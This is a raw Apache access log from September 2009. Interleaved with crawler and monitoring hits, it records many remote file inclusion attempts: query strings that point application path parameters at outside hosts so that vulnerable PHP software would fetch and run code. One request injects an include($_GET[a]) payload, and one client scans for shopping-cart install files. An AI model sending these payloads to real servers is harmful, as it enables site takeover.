72.30.142.250 - - [23/Sep/2009:05:30:42 -0400] "GET /logs/error_log.Q109020900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.122.72.216 - - [23/Sep/2009:05:31:16 -0400] "GET /logs/access_log.Q109091200//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
222.122.72.216 - - [23/Sep/2009:05:31:26 -0400] "GET /logs/access_log.Q109091200//zero_vote/ask_password.php?dir=http://web-montagne.com/id1.php? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
61.100.5.136 - - [23/Sep/2009:05:31:37 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:31:38 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.205.103.171 - - [23/Sep/2009:05:32:23 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://www.torrent30t.com/files/.idx? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
121.78.116.209 - - [23/Sep/2009:05:32:28 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path%5Bdocroot%5D=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.14.219.41 - - [23/Sep/2009:05:32:29 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
121.78.116.209 - - [23/Sep/2009:05:32:29 -0400] "GET /logs/access_log.Q109071300%20%20//newspublish/include.php?path%5Bdocroot%5D=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
110.45.144.59 - - [23/Sep/2009:05:32:37 -0400] "GET /?custompluginfile[]=http://www.grate.ru/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
110.45.144.59 - - [23/Sep/2009:05:32:37 -0400] "GET /logs/access_log.Q109081800%20%20/?custompluginfile[]=http://www.grate.ru/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
213.203.198.252 - - [23/Sep/2009:05:32:39 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.69"
110.45.144.59 - - [23/Sep/2009:05:32:37 -0400] "GET /logs/?custompluginfile[]=http://www.grate.ru/id1.txt? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
67.205.103.171 - - [23/Sep/2009:05:32:42 -0400] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://www.torrent30t.com/files/.idx? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
67.205.103.171 - - [23/Sep/2009:05:32:42 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://www.torrent30t.com/files/.idx? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
67.205.103.171 - - [23/Sep/2009:05:32:42 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.torrent30t.com/files/.idx? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
209.59.12.99 - - [23/Sep/2009:05:32:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.205.103.171 - - [23/Sep/2009:05:32:53 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://www.torrent30t.com/files/.idx? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
72.30.142.250 - - [23/Sep/2009:05:32:59 -0400] "GET /logs/access_log.Q109071600 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.155.5.84 - - [23/Sep/2009:05:33:01 -0400] "GET /logs/access_log.Q109061600//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
208.89.220.238 - - [23/Sep/2009:05:33:28 -0400] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.831"
208.89.220.238 - - [23/Sep/2009:05:33:28 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
208.89.220.238 - - [23/Sep/2009:05:33:28 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 218 "-" "libwww-perl/5.831"
208.89.220.238 - - [23/Sep/2009:05:33:30 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
208.89.220.238 - - [23/Sep/2009:05:33:37 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.831"
85.14.219.41 - - [23/Sep/2009:05:33:52 -0400] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.14.219.41 - - [23/Sep/2009:05:33:52 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
85.14.219.41 - - [23/Sep/2009:05:33:52 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
85.14.219.41 - - [23/Sep/2009:05:34:05 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET HTTP/1.1 HTTP/1.1" 400 189 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /install.txt HTTP/1.1" 404 209 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /cart/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /zencart/install.txt HTTP/1.1" 404 217 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /zen-cart/install.txt HTTP/1.1" 404 218 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /zen/install.txt HTTP/1.1" 404 213 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /shop/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /butik/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:32 -0400] "GET /zcart/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:33 -0400] "GET /shop2/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:33 -0400] "GET /catalog/install.txt HTTP/1.1" 404 217 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:33 -0400] "GET /boutique/install.txt HTTP/1.1" 404 218 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:33 -0400] "GET /cart/install.txt HTTP/1.1" 404 214 "-" "Toata dragostea mea pentru diavola"
75.101.213.210 - - [23/Sep/2009:05:34:33 -0400] "GET /store/install.txt HTTP/1.1" 404 215 "-" "Toata dragostea mea pentru diavola"
85.14.219.41 - - [23/Sep/2009:05:35:19 -0400] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.14.219.41 - - [23/Sep/2009:05:35:19 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
85.14.219.41 - - [23/Sep/2009:05:35:20 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
213.203.198.252 - - [23/Sep/2009:05:36:04 -0400] "GET /logs/access_log.Q109051500//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.69"
213.203.198.252 - - [23/Sep/2009:05:36:05 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.69"
213.203.198.252 - - [23/Sep/2009:05:36:05 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 218 "-" "libwww-perl/5.69"
85.14.219.41 - - [23/Sep/2009:05:36:06 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
204.152.199.34 - - [23/Sep/2009:05:36:19 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:36:19 -0400] "GET /logs/access_log.Q109071600/?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:36:19 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
213.203.198.252 - - [23/Sep/2009:05:36:54 -0400] "GET /logs/access_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.69"
61.100.5.136 - - [23/Sep/2009:05:37:04 -0400] "GET /logs/access_log.Q109091000//citywriter/head.php?path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:37:41 -0400] "GET /logs/access_log.Q109071600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:05:37:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.152.199.34 - - [23/Sep/2009:05:37:49 -0400] "GET /logs/error_log.Q109080500%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.249.68.151 - - [23/Sep/2009:05:38:00 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
61.100.5.136 - - [23/Sep/2009:05:38:12 -0400] "GET /logs/access_log.Q109051600//citywriter/head.php?path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.68.151 - - [23/Sep/2009:05:38:00 -0400] "GET /logs/access_log.Q109062400 HTTP/1.1" 200 4898892 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.152.199.34 - - [23/Sep/2009:05:40:02 -0400] "GET /logs/error_log.Q109090500/?_SERVER[DOCUMENT_ROOT]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:42:44 -0400] "GET /logs/access_log.Q109062700//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Sep/2009:05:43:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.194.44.136 - - [23/Sep/2009:05:44:05 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lam3rz.superweb.ws/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
220.194.44.136 - - [23/Sep/2009:05:44:45 -0400] "GET /logs/access_log.Q109052500%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://lam3rz.superweb.ws/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
213.203.198.252 - - [23/Sep/2009:05:44:45 -0400] "GET /logs/error_log.Q109081400//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 239 "-" "libwww-perl/5.69"
213.203.198.252 - - [23/Sep/2009:05:44:45 -0400] "GET //init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 213 "-" "libwww-perl/5.69"
213.203.198.252 - - [23/Sep/2009:05:44:45 -0400] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 218 "-" "libwww-perl/5.69"
110.45.144.59 - - [23/Sep/2009:05:45:00 -0400] "GET /logs/access_log.Q109081800/?custompluginfile[]=http://www.grate.ru/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.155.5.84 - - [23/Sep/2009:05:47:24 -0400] "GET /logs/access_log.Q109062700//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:47:25 -0400] "GET /logs/access_log.Q109061800//agendax/addevent.inc.php?agendax_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:47:25 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:47:25 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:47:30 -0400] "GET /logs/access_log.Q109081900//agendax/addevent.inc.php?agendax_path=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
213.203.198.252 - - [23/Sep/2009:05:47:51 -0400] "GET /logs/access_log.Q109051600//init_basic.php?GALLERY_BASEDIR=http://hr-mag.com/images/id? HTTP/1.1" 404 240 "-" "libwww-perl/5.69"
209.59.12.99 - - [23/Sep/2009:05:48:42 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.100.5.136 - - [23/Sep/2009:05:51:05 -0400] "GET //agendax/addevent.inc.php?agendax_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:51:05 -0400] "GET /logs/access_log.Q109061800//agendax/addevent.inc.php?agendax_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:51:05 -0400] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.100.5.136 - - [23/Sep/2009:05:51:13 -0400] "GET /logs/access_log.Q109081900//agendax/addevent.inc.php?agendax_path=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
85.18.11.66 - - [23/Sep/2009:05:54:23 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.kupcnj.com/www/bbs/skin/ggambo6200_music//idmio.txt?%0D?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
85.18.11.66 - - [23/Sep/2009:05:54:23 -0400] "GET /logs/access_log.Q109071600/?_SERVER[DOCUMENT_ROOT]=http://www.kupcnj.com/www/bbs/skin/ggambo6200_music//idmio.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
85.18.11.66 - - [23/Sep/2009:05:54:23 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.kupcnj.com/www/bbs/skin/ggambo6200_music//idmio.txt?%0D?? HTTP/1.1" 200 18972 "-" "libwww-perl/5.79"
85.18.11.66 - - [23/Sep/2009:05:54:34 -0400] "GET /logs/error_log.Q109080500/?_SERVER[DOCUMENT_ROOT]=http://www.kupcnj.com/www/bbs/skin/ggambo6200_music//idmio.txt?%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
209.59.12.99 - - [23/Sep/2009:05:55:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.222.40.169 - - [23/Sep/2009:05:57:52 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:05:57:52 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:05:57:52 -0400] "GET /logs/access_log.Q109072000//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:58:57 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:58:57 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:58:57 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.109.108.146 - - [23/Sep/2009:05:59:03 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
210.109.108.146 - - [23/Sep/2009:05:59:03 -0400] "GET /logs/access_log.Q109071600/?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
210.109.108.146 - - [23/Sep/2009:05:59:04 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.cascadecollision.com////portals/fx29id1.txt??? HTTP/1.1" 200 18972 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:05:59:06 -0400] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.222.40.169 - - [23/Sep/2009:05:59:31 -0400] "GET /logs/access_log.Q109072000%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.internet-partner.ru/netcat_files/fx29id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:26 -0400] "GET //appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:26 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:26 -0400] "GET /logs//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:27 -0400] "GET /logs//appserv/main.php?appserv_root=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:27 -0400] "GET //appserv/main.php?appserv_root=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:27 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:30 -0400] "GET //appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:30 -0400] "GET /logs//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:01:30 -0400] "GET /logs/access_log.Q109051400//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:02:14 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:02:24 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
204.152.199.34 - - [23/Sep/2009:06:02:24 -0400] "GET /logs/access_log.Q109082500%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rucoc.com/rucoc1.jpg??? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:02:25 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://visualSide.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.89.7 - - [23/Sep/2009:06:02:29 -0400] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://visualcrew.fileave.com/id/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:47 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:47 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:47 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:49 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:49 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:50 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:56 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:56 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:02:56 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:02 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:02 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:02 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.30.142.250 - - [23/Sep/2009:06:03:11 -0400] "GET /logs/error_log.Q109090500 HTTP/1.0" 200 3197489 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.250 - - [23/Sep/2009:06:03:11 -0400] "GET /logs/error_log.Q109090500 HTTP/1.0" 200 3197489 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [23/Sep/2009:06:03:43 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.225.196.53 - - [23/Sep/2009:06:03:52 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:52 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:52 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:58 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:58 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.225.196.53 - - [23/Sep/2009:06:03:58 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://yestour.net//bbs/s_golf/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
119.63.193.55 - - [23/Sep/2009:06:04:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
85.18.11.66 - - [23/Sep/2009:06:06:24 -0400] "GET /logs/error_log.Q109080500%20/?_SERVER[DOCUMENT_ROOT]=http://www.kupcnj.com/www/bbs/skin/ggambo6200_music//idmio.txt?%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
